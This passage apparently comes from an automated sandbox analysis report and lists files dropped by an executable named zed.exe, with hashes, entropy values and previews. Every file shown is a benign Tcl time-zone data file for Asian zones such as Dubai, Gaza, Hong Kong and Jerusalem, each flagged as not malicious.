                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):235
                                                                                                                                                                                                                                            Entropy (8bit):4.597480383845617
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKCXeSDm2OHnBGeoH1mpvyvScHTU71avScr:MB862qXbmdHnBvC1SyHHq8Hr
                                                                                                                                                                                                                                            MD5:316DDF860FA234621698EB473E558DB7
                                                                                                                                                                                                                                            SHA1:35BF955F764555945CF8B314B8E881DAD6CF557B
                                                                                                                                                                                                                                            SHA-256:8BC2E0D77AC35B6D63E11B820AC45EC23A4195ED773680C600C772FDF4B953F8
                                                                                                                                                                                                                                            SHA-512:D1A8D5F1DAAB7827BDCBC14506AF8681FD1ED94C6101CC4A3C8CC2A76EA7D3649038069158C539A2007A1B0734FBD87DE120415E07A3F08F44417100C95459F5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dili) {.. {-9223372036854775808 30140 0 LMT}.. {-1830414140 28800 0 +08}.. {-879152400 32400 0 +09}.. {199897200 28800 0 +08}.. {969120000 32400 0 +09}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):148
                                                                                                                                                                                                                                            Entropy (8bit):4.97292023820863
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKQUMXGm2OHvkdoHsQK23NVsRYovV:SlSWB9eg/2wKQUDm2OHvsoHxVNSN
                                                                                                                                                                                                                                            MD5:861BA4A0A71E6C3F71B90074275FD57C
                                                                                                                                                                                                                                            SHA1:BC6FC5233340BB19AE4BD0BA563875479AC0A2B9
                                                                                                                                                                                                                                            SHA-256:3DB174F1568BC23BF467A3DC7BAF8A2A2952B70653D4DE54F4DB391EC50B6925
                                                                                                                                                                                                                                            SHA-512:B187735E0783F299253D9F93E002AEFF131FCCA50FB3E04CF0545B334B051D5ED978108A47C6957B608F5F93ED4CC3D69751FE0F40413719EE1C0440CD49AC76
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dubai) {.. {-9223372036854775808 13272 0 LMT}.. {-1577936472 14400 0 +04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):820
                                                                                                                                                                                                                                            Entropy (8bit):3.969189280047274
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5we3dJvOt81FCuLqecDngO6jPvTpYy5T4TiFGDr:5BvdJqxiF0uGr
                                                                                                                                                                                                                                            MD5:9ABD0ECB5F3E738F49CDD1F81C9FF1A4
                                                                                                                                                                                                                                            SHA1:46B68C7BBD1BE9791B00128A5129AA3668435C93
                                                                                                                                                                                                                                            SHA-256:550DB44595F59D0F151BE4AF70D6FECE20580AB687EF45DE2A0A75FB2515AC80
                                                                                                                                                                                                                                            SHA-512:67E2B0EF216D509C4B6DD367519E0A733E54A7CA767D5F7960715E8056E61B7B633C7516D568544F55C9277E90412C1443B822C6EED3341C01F1BD9AA9476FA1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dushanbe) {.. {-9223372036854775808 16512 0 LMT}.. {-1441168512 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 21600 1 +06}.. {684363600 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7597
                                                                                                                                                                                                                                            Entropy (8bit):3.7170041442081203
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:G3pv/7V6Aj8aZaNlK0UpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0l:G3v/AaaivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:F8E4BA3E260452AE13CF234E60149A62
                                                                                                                                                                                                                                            SHA1:8DDB08E2FDEEF6539EE0C0038B166908BFED16CD
                                                                                                                                                                                                                                            SHA-256:8CFE85C48FC22033411432F8B75EE4C097A5D84897698CB1AFD5AB51C47FF5A3
                                                                                                                                                                                                                                            SHA-512:487177411FB7E9F83AB9AAD84B685322B13A85784D4F90BB9C30F57BFAA6A9298E5C4F36C97444DE1117E51F85A62DC639D08B405460D071C2B29C898553E9A3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Famagusta) {.. {-9223372036854775808 8148 0 LMT}.. {-1518920148 7200 0 EET}.. {166572000 10800 1 EEST}.. {182293200 7200 0 EET}.. {200959200 10800 1 EEST}.. {213829200 7200 0 EET}.. {228866400 10800 1 EEST}.. {243982800 7200 0 EET}.. {260316000 10800 1 EEST}.. {276123600 7200 0 EET}.. {291765600 10800 1 EEST}.. {307486800 7200 0 EET}.. {323820000 10800 1 EEST}.. {338936400 7200 0 EET}.. {354664800 10800 1 EEST}.. {370386000 7200 0 EET}.. {386114400 10800 1 EEST}.. {401835600 7200 0 EET}.. {417564000 10800 1 EEST}.. {433285200 7200 0 EET}.. {449013600 10800 1 EEST}.. {465339600 7200 0 EET}.. {481068000 10800 1 EEST}.. {496789200 7200 0 EET}.. {512517600 10800 1 EEST}.. {528238800 7200 0 EET}.. {543967200 10800 1 EEST}.. {559688400 7200 0 EET}.. {575416800 10800 1 EEST}.. {591138000 7200 0 EET}.. {606866400 10800 1 EEST}.. {622587
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8427
                                                                                                                                                                                                                                            Entropy (8bit):3.7494839792487094
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:NyHSd2XK1GbJFp3gP0nPVl8dcqU/8O8pc1FoMpQ2NpPfM2g1siiVVfIsuDzhsXaP:NyyIgGbJv3dPAD7c1FoMpHu3Ky3p
                                                                                                                                                                                                                                            MD5:DEB2D261D6885CD83054391D010DE6AD
                                                                                                                                                                                                                                            SHA1:5779B343F4EB2BC75613C593E2FA3A026857F940
                                                                                                                                                                                                                                            SHA-256:A1823EDA63434ACF1A37B3A781A783CFEB6BB4CC53ED0469BB685834837F2289
                                                                                                                                                                                                                                            SHA-512:D024B2D324D981A6792127551B0D466EAFFC5294C84CB5752A71E5267FB2E9162E7EFAED5A5CA3B06BBAD285F62BF955B0EF86DD39307EE5F935FC601F4EEEFA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Gaza) {.. {-9223372036854775808 8272 0 LMT}.. {-2185409872 7200 0 EEST}.. {-933638400 10800 1 EEST}.. {-923097600 7200 0 EEST}.. {-919036800 10800 1 EEST}.. {-857347200 7200 0 EEST}.. {-844300800 10800 1 EEST}.. {-825811200 7200 0 EEST}.. {-812678400 10800 1 EEST}.. {-794188800 7200 0 EEST}.. {-779846400 10800 1 EEST}.. {-762652800 7200 0 EEST}.. {-748310400 10800 1 EEST}.. {-731116800 7200 0 EEST}.. {-682653600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-16580
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.86422571961583
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFKwHp4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wKi4wKU
                                                                                                                                                                                                                                            MD5:1BCCB3578FADE993EE8B2C11EAC06CD8
                                                                                                                                                                                                                                            SHA1:CAEAB714E014CD5040C44E4603708B97BC0B03D4
                                                                                                                                                                                                                                            SHA-256:12811A7944B892E3D1C0B4B09057CC1899F28081B3CD47FFD248BA49BA308AF0
                                                                                                                                                                                                                                            SHA-512:1D791DC0E8F45359366DF33C2C337688D2E0E972A90F038733B840D28585505AEF542DDBAD014C9EA8C252048A588CD017DD67A84545A81EDB7C17E3B2E65092
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Harbin) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8402
                                                                                                                                                                                                                                            Entropy (8bit):3.7520828858184325
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:fXSd2XK1GbJFp3gP0nPVl8dcqUZ8O8pc1FoMpQ2NpPfM2g1siiVVfIsuDzhsXa4a:fiIgGbJv3dPADPc1FoMpHu3Ky3p
                                                                                                                                                                                                                                            MD5:6F176787C7FC5764A63719F0041690BA
                                                                                                                                                                                                                                            SHA1:C292A8CEA597D7FD9E2D071AB7AE93E7ABCA21A5
                                                                                                                                                                                                                                            SHA-256:732CAA355542C8781C61FC8F5265EBFC59C8CC24E78D01011E1E3256E6B34DC7
                                                                                                                                                                                                                                            SHA-512:EE8F39A3D65D75E14B59B4D9CCB27894210CA269E82A7AC7F98BE67764688A8895EBB9C1ACEAB4C1B368B4F1BC5AFCB34E8866CEDFD91232926DF47517096513
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hebron) {.. {-9223372036854775808 8423 0 LMT}.. {-2185410023 7200 0 EEST}.. {-933638400 10800 1 EEST}.. {-923097600 7200 0 EEST}.. {-919036800 10800 1 EEST}.. {-857347200 7200 0 EEST}.. {-844300800 10800 1 EEST}.. {-825811200 7200 0 EEST}.. {-812678400 10800 1 EEST}.. {-794188800 7200 0 EEST}.. {-779846400 10800 1 EEST}.. {-762652800 7200 0 EEST}.. {-748310400 10800 1 EEST}.. {-731116800 7200 0 EEST}.. {-682653600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-165
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):395
                                                                                                                                                                                                                                            Entropy (8bit):4.431055857167822
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862RLmdHneCvhYC5sF/p+zHHviViksF/dMUYPsF/RQ9EsV:5de3vhd5sFR+znv2vsFlM/PsFVsV
                                                                                                                                                                                                                                            MD5:A49A3D55C1E10A37125C51F9C6363868
                                                                                                                                                                                                                                            SHA1:7C1B5D44643ADC3F02681F6379E82C3F4512F0C1
                                                                                                                                                                                                                                            SHA-256:D8A19C70BE5A9AE1E6091DC8FD03D7719110D1F3D78786C91D5BD0949FB5A428
                                                                                                                                                                                                                                            SHA-512:804C44E51BB9E93B156B0CB4CB125651003B3C42D65334A052BE149734221315CC75D4FBDE34F62DFC102F1A9C968D1C9B573839C7ECBF7397B61BD90E530B20
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ho_Chi_Minh) {.. {-9223372036854775808 25590 0 LMT}.. {-2004073590 25590 0 PLMT}.. {-1851577590 25200 0 +07}.. {-852105600 28800 0 +08}.. {-782643600 32400 0 +09}.. {-767869200 25200 0 +07}.. {-718095600 28800 0 +08}.. {-457776000 25200 0 +07}.. {-315648000 28800 0 +08}.. {171820800 25200 0 +07}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2226
                                                                                                                                                                                                                                            Entropy (8bit):4.0055033036300145
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5Ze9l9Pm4yoHtTYJJIX1Zcp6GS0j1SPQpP6gPE8fTZIPNYQGm75st/nQdwi9:DyaoTcwQt6EsQTng
                                                                                                                                                                                                                                            MD5:26BCBBA28AE34FE3CF7D17EF4C6B69C8
                                                                                                                                                                                                                                            SHA1:5324DEA8E7965C66650E7B4769EFA1297B508486
                                                                                                                                                                                                                                            SHA-256:EE9A6997BC1AAD4A8FA95DB312774C3F37FBB895549230C30FC66C02CC170EB6
                                                                                                                                                                                                                                            SHA-512:54594CD18838B4A8947EBB5BDE2415727CC127CF79AEC98FC0F5D5A32F68EEAF4E079853239DE9F753CE90F18EFD55AE51FC43D64E313666CEA0EF8AC93BF065
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hong_Kong) {.. {-9223372036854775808 27402 0 LMT}.. {-2056690800 28800 0 HKT}.. {-900910800 32400 1 HKST}.. {-891579600 30600 1 HKWT}.. {-884248200 32400 0 JST}.. {-761209200 28800 0 HKT}.. {-747907200 32400 1 HKST}.. {-728541000 28800 0 HKT}.. {-717049800 32400 1 HKST}.. {-697091400 28800 0 HKT}.. {-683785800 32400 1 HKST}.. {-668061000 28800 0 HKT}.. {-654755400 32400 1 HKST}.. {-636611400 28800 0 HKT}.. {-623305800 32400 1 HKST}.. {-605161800 28800 0 HKT}.. {-591856200 32400 1 HKST}.. {-573712200 28800 0 HKT}.. {-559801800 32400 1 HKST}.. {-541657800 28800 0 HKT}.. {-528352200 32400 1 HKST}.. {-510211800 28800 0 HKT}.. {-498112200 32400 1 HKST}.. {-478762200 28800 0 HKT}.. {-466662600 32400 1 HKST}.. {-446707800 28800 0 HKT}.. {-435213000 32400 1 HKST}.. {-415258200 28800 0 HKT}.. {-403158600 32400 1 HKST}.. {-383808600 28800 0 HKT
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1583
                                                                                                                                                                                                                                            Entropy (8bit):3.7521760184466206
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5x3LecCvgsFFFKOksF8FpsF71FQnsFNFxhsFlF6sFaFasFZFisF8GF5sFKLFAZsZ:5FqKVx8Cq9f/y2L
                                                                                                                                                                                                                                            MD5:A77140A0D8C2D3E2993E4BA7CADFB4C6
                                                                                                                                                                                                                                            SHA1:AE3586264A86D42F578D4B0F7A30C9BE6047EAB1
                                                                                                                                                                                                                                            SHA-256:CA88A45E954A9854C680B399E69E4858BF5E861FABFADC19D62D97B734B25415
                                                                                                                                                                                                                                            SHA-512:05EA9D903EEC755F799B7C2399ED933245A5AE3A594648FE37AF1CE7699AE499B4ED159F428D91259D80BC9AF5117F2DA055A506AED94E5281C38B7AFF69C6FE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hovd) {.. {-9223372036854775808 21996 0 LMT}.. {-2032927596 21600 0 +06}.. {252439200 25200 0 +07}.. {417978000 28800 1 +07}.. {433785600 25200 0 +07}.. {449600400 28800 1 +07}.. {465321600 25200 0 +07}.. {481050000 28800 1 +07}.. {496771200 25200 0 +07}.. {512499600 28800 1 +07}.. {528220800 25200 0 +07}.. {543949200 28800 1 +07}.. {559670400 25200 0 +07}.. {575398800 28800 1 +07}.. {591120000 25200 0 +07}.. {606848400 28800 1 +07}.. {622569600 25200 0 +07}.. {638298000 28800 1 +07}.. {654624000 25200 0 +07}.. {670352400 28800 1 +07}.. {686073600 25200 0 +07}.. {701802000 28800 1 +07}.. {717523200 25200 0 +07}.. {733251600 28800 1 +07}.. {748972800 25200 0 +07}.. {764701200 28800 1 +07}.. {780422400 25200 0 +07}.. {796150800 28800 1 +07}.. {811872000 25200 0 +07}.. {828205200 28800 1 +07}.. {843926400 25200 0 +07}.. {859654800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2089
                                                                                                                                                                                                                                            Entropy (8bit):3.7296034934492694
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5PZy4DdOKStci4KjXoYjoSvfQJWE00dtT43kgiTskNrrBizhzRBqY3M:Py2/svfraBGfgP
                                                                                                                                                                                                                                            MD5:C9F7AC464970567E5C38CB01ED2297AE
                                                                                                                                                                                                                                            SHA1:453718BACCAE3FACD761AF22CA5875185478ADDD
                                                                                                                                                                                                                                            SHA-256:61BAAAD6315FFBDAED6F266880165B06ECCAF72F660B7FB01C8B654F3952D68E
                                                                                                                                                                                                                                            SHA-512:72044EFAE262CC12974F2DE2AAF06AC4C31BE73071ACD53DDC6B8D8BFC6FBDF937EC03DC881901F730659BDE662FBCFC76C57B2C086DAA97F160530464FBA7C6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Irkutsk) {.. {-9223372036854775808 25025 0 LMT}.. {-2840165825 25025 0 IMT}.. {-1575874625 25200 0 +07}.. {-1247554800 28800 0 +09}.. {354902400 32400 1 +09}.. {370710000 28800 0 +08}.. {386438400 32400 1 +09}.. {402246000 28800 0 +08}.. {417974400 32400 1 +09}.. {433782000 28800 0 +08}.. {449596800 32400 1 +09}.. {465328800 28800 0 +08}.. {481053600 32400 1 +09}.. {496778400 28800 0 +08}.. {512503200 32400 1 +09}.. {528228000 28800 0 +08}.. {543952800 32400 1 +09}.. {559677600 28800 0 +08}.. {575402400 32400 1 +09}.. {591127200 28800 0 +08}.. {606852000 32400 1 +09}.. {622576800 28800 0 +08}.. {638301600 32400 1 +09}.. {654631200 28800 0 +08}.. {670356000 25200 0 +08}.. {670359600 28800 1 +08}.. {686084400 25200 0 +07}.. {695761200 28800 0 +09}.. {701805600 32400 1 +09}.. {717530400 28800 0 +08}.. {733255200 32400 1 +09}.. {748
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.9013773460609
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV0XaDovXHAIgoq3XRFvHRL/2WFK4HB/8QaqXKv:SlSWB9vsM3ymQa2HAIgoQ/HN/2wK4HJa
                                                                                                                                                                                                                                            MD5:8A92C690BE27A69D122BFF51479B7B56
                                                                                                                                                                                                                                            SHA1:52DB64587A347F34153A51788BDE8C349D966575
                                                                                                                                                                                                                                            SHA-256:1F77C4BD27574E1D2066885DEF01806A02D3E444424A219A8EC5C114F89665E5
                                                                                                                                                                                                                                            SHA-512:FEDF57C4862B6792A789F339EB1027EC8A8472B01B7D1D0814C419850B9AC03A7B454FDB04D8BECE166E9A8BCAA58B0B461007A6C824B30B1080991A1DB49CCA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Istanbul)]} {.. LoadTimeZoneFile Europe/Istanbul..}..set TZData(:Asia/Istanbul) $TZData(:Europe/Istanbul)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):370
                                                                                                                                                                                                                                            Entropy (8bit):4.4733192761103515
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKcrJfDm2OHATJeoHMaSYov/YSZkc5q/MVSSFFWSyvScH+dMVSSFL+:MB862EJLmdHjCEdOc5aMxaSyHHaMxF6P
                                                                                                                                                                                                                                            MD5:C689A1AA9FFE535AEB3AD3D7EDE55172
                                                                                                                                                                                                                                            SHA1:0520FC9A4619FB555A79C5DF2AE82422BF2C5EDA
                                                                                                                                                                                                                                            SHA-256:2F39D9F93761B85C254F458317A7DE2B4184BE9459F2193A85C08662E801269A
                                                                                                                                                                                                                                            SHA-512:C1034FB2FCFEF201C5362AF21B048B6637A824C5C93D75854CF3807892C772CD4376533E58BFF8D8726F531F43CB231365B8012EBD3C1BECED865D3CD2D6673D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jakarta) {.. {-9223372036854775808 25632 0 LMT}.. {-3231299232 25632 0 BMT}.. {-1451719200 26400 0 +0720}.. {-1172906400 27000 0 +0730}.. {-876641400 32400 0 +09}.. {-766054800 27000 0 +0730}.. {-683883000 28800 0 +08}.. {-620812800 27000 0 +0730}.. {-189415800 25200 0 WIB}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):213
                                                                                                                                                                                                                                            Entropy (8bit):4.834345288972067
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKcaDm2OHG4YoH1kcfvScHVowkVcr2CV4zvhyov:MB862PmdHNYC6cfHHVop2NVkoov
                                                                                                                                                                                                                                            MD5:2CB3A13FCC48F8C4457E001FC309918B
                                                                                                                                                                                                                                            SHA1:83174176815CB93D216B5BC532C120EC8AC433CF
                                                                                                                                                                                                                                            SHA-256:761C1E80FEBF46D6D6215CEBF211F121974156D9BCE2FB4258C1074C6ED2CE22
                                                                                                                                                                                                                                            SHA-512:65009020AB9FEC2F8158A4851A78B71127F9B262DDD1472583942E19B7C086304F54BC8DAE5A40BD1448BCAEDA0FDBACCD19400E10FFA0357E324535F9036EF0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jayapura) {.. {-9223372036854775808 33768 0 LMT}.. {-1172913768 32400 0 +09}.. {-799491600 34200 0 +0930}.. {-189423000 32400 0 WIT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8135
                                                                                                                                                                                                                                            Entropy (8bit):3.770028446231146
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:GKfnxFAEX/nPVl8diAg9oEhH20AHz7LzdWhYbBJPXuVhKaM76Rmg4DLeEcNptv5C:7ffBvPAzF0AHzPzdD1+XBRF0
                                                                                                                                                                                                                                            MD5:884227D48C92BA6C519BFE571D4F1037
                                                                                                                                                                                                                                            SHA1:21F8977816C2B439686A50D353B836A6D132A946
                                                                                                                                                                                                                                            SHA-256:0BDC2C693134199C2ECD374CC01468813DB29DF47422C706A3EA2BE5ECCA177A
                                                                                                                                                                                                                                            SHA-512:8A09F1FE11DAD203501A16FE6A2CAEC969FE3553B456B8BD1997E55B3EE430B2BB4B54F7D87C5E99931FD96E7C769CAA618C777EBD23FBD1E1A0F57409422914
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jerusalem) {.. {-9223372036854775808 8454 0 LMT}.. {-2840149254 8440 0 JMT}.. {-1641003640 7200 0 IST}.. {-933638400 10800 1 IDT}.. {-923097600 7200 0 IST}.. {-919036800 10800 1 IDT}.. {-857347200 7200 0 IST}.. {-844300800 10800 1 IDT}.. {-825811200 7200 0 IST}.. {-812678400 10800 1 IDT}.. {-794188800 7200 0 IST}.. {-779846400 10800 1 IDT}.. {-762652800 7200 0 IST}.. {-748310400 10800 1 IDT}.. {-731116800 7200 0 IST}.. {-681955200 14400 1 IDDT}.. {-673228800 10800 1 IDT}.. {-667958400 7200 0 IST}.. {-652320000 10800 1 IDT}.. {-636422400 7200 0 IST}.. {-622080000 10800 1 IDT}.. {-608947200 7200 0 IST}.. {-591840000 10800 1 IDT}.. {-572486400 7200 0 IST}.. {-558576000 10800 1 IDT}.. {-542851200 7200 0 IST}.. {-527731200 10800 1 IDT}.. {-514425600 7200 0 IST}.. {-490838400 10800 1 IDT}.. {-482976000 7200 0 IST}.. {-459388800 10800 1 I
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.8546989169864085
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKTtNMXGm2OHodFxsYoHvgVHURRNVsRYovFFFkdj/cXHF:SlSWB9eg/2wKTPDm2OHoH+YoHvgVHURA
                                                                                                                                                                                                                                            MD5:9BD9B21661C235C0794078EC98978D3B
                                                                                                                                                                                                                                            SHA1:3D854780F49D0E5F5A190DC9367C7406127C5E4D
                                                                                                                                                                                                                                            SHA-256:A59C95C038F2E945D685D96FA9B859CE82A643A1B7F56EB36B2C809DE91CD4BA
                                                                                                                                                                                                                                            SHA-512:A76E99CF03DA8897F0A210A98DB79E4CD60070F2BE363D0D0960D9882919F9B49978FA55BB2500F1648ADD4080730CAD85BAFF61D885A9EAD394AC04C850F6BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kabul) {.. {-9223372036854775808 16608 0 LMT}.. {-2524538208 14400 0 +04}.. {-788932800 16200 0 +0430}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2060
                                                                                                                                                                                                                                            Entropy (8bit):3.788131608921229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5+SeWI/2kkWk7YFpR2kHmxCcUdBbcHDLV2vpXt25A0UeRr9ydzkMfF6USRWk9UuV:5i/2ZsFLrcZwvJt2F+doTr9Q3G80
